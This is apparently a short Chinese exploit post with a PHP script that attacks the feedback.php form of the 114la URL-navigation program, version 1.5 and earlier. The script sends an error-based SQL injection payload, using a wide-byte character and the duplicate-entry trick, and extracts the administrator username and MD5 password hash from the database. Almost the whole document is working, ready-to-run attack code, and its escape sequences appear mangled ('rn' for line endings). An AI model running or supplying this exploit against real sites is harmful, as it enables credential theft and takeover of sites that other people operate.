雨林木风的114啦网址导航程序留言文件存在注入漏洞。攻击者利用EXP

可以得到管理员帐号和MD5密码。

版本：<=1.5

EXP如下：

<?php
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);
die();
}
ob_start();
$url = $argv[1];
$path= $argv[2];
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)n");
$data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";
fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1rn");
fwrite($sock, "Accept: */*rn");
fwrite($sock, "Referer: http://$url/#Mrn");
fwrite($sock, "Accept-Language: zh-cnrn");
fwrite($sock, "Content-Type: application/x-www-form-urlencodedrn");
fwrite($sock, "Accept-Encoding: gzip, deflatern");
fwrite($sock, "User-Agent: Mozillarn");
fwrite($sock, "Host: $urlrn");
fwrite($sock, "Content-Length: ".strlen($data)."rn");
fwrite($sock, "Connection: Keep-Alivern");
fwrite($sock, "Cache-Control: no-cachern");
fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAONrnrn");
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
$headers .= "$strn";
echo "n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
if (strpos($body, 'Duplicate entry') !== false) {
preg_match('/Duplicate entry '(.*)1'/', $body, $arr);
$result=explode("_",$arr[1]);
print_r("Exploit Success! nusername:".$result[0]."npassword:".$result[1]."nGood Luck!");
}else{
print_r("Exploit Failed! n");
}
ob_end_flush();
?>